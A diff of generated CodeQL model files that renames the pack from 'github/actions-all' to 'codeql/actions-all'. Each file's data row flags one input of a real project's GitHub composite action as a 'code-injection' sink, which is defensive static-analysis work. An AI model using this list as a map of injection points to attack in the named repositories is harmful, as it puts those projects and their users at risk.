diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index e8250232853b..f9b39981ab8f 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index d3172c566678..1c90c92ca21b 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index 7c1f9dac6bb6..25f194e823a6 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index c77798c10222..2f1481c9c554 100644 
--- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 3035324bee02..67a1836e8267 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index dd208976fc51..917bd6b03074 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 63f111f3e83c..98190bffee47 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index c330ca64c083..4916ce713d7c 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index 6b67c69e6e35..e015387a96db 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 135bb4baa8be..b9c1ff99ab38 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index c201386cf93f..e8cde1a082f5 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 5e39d3f6c5f4..1f5bd390369b 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9a9f865b0db4..2097e02a48ae 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 5c877a87d688..131b59e4f426 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index 6e9e83632904..2b6604f4bce7 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index f0e62cdaec1a..028fac59db90 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index b1158922636e..e188c7fb160c 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index 78c1a3960566..fe09708380b4 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index 75c257f39ae7..430d128f1a00 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 4d19b3ec0af1..ecfd41e15dc8 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index b8bdc7276fbe..b334b14eb37d 100644 
--- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 220dbb58e025..936a44a214ba 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 1992cbf46967..c116f45a7dfe 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 02c01196842d..f8438e902c6e 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 50af2e33e162..dc392c76263d 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 679b362ba3f1..0e7876a64fe4 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 8e11db68c85e..ccad63033af8 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index deed2d125737..138ced8ab043 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index 353cb30683b0..20493280565c 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 25522a67b69a..a0d3adcc3d2b 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index c545ad6844ef..7db33e6e72c3 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index 941710eb0fe2..c4fca4427eca 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 75b744fc036b..09d2beb89470 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 7a4ea3514ba4..bd5de74fa09d 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 25a25d085ad1..5b46de73fc27 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 23bd58d66cba..970fd7bc1f13 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 1849ad0e2f56..af46895fa51f 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index c4861c77842b..98ef93128eb3 100644 
--- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b11931b54086..8d4820efeb70 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 1b3fffbe8693..44f0c6dce8f8 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index df6f6088087d..d874137e497a 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 89c10bd95c22..2ec8442b1cf7 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index 4a471b5a97cf..046bb764a1d6 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 9f2448a6d752..dcd8a2df02c0 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index dc8a362dc964..238d675e5b7f 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index a1f2ccb164e7..c6f83e458bde 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 303f9d56cb22..8a10734bd645 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 2f28cf86431c..770554c8b9df 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index efbcceb48f56..fb0631e0bbbb 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 649fac9fede6..caf896bbac3d 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 3623fe51e843..02917d6da30e 100644 
--- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index d730cdb6a990..17bea3155c5a 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index bcec913ef7c5..64ff68f38ad1 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index ad5ec2e544fc..c6bdede140fd 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml 
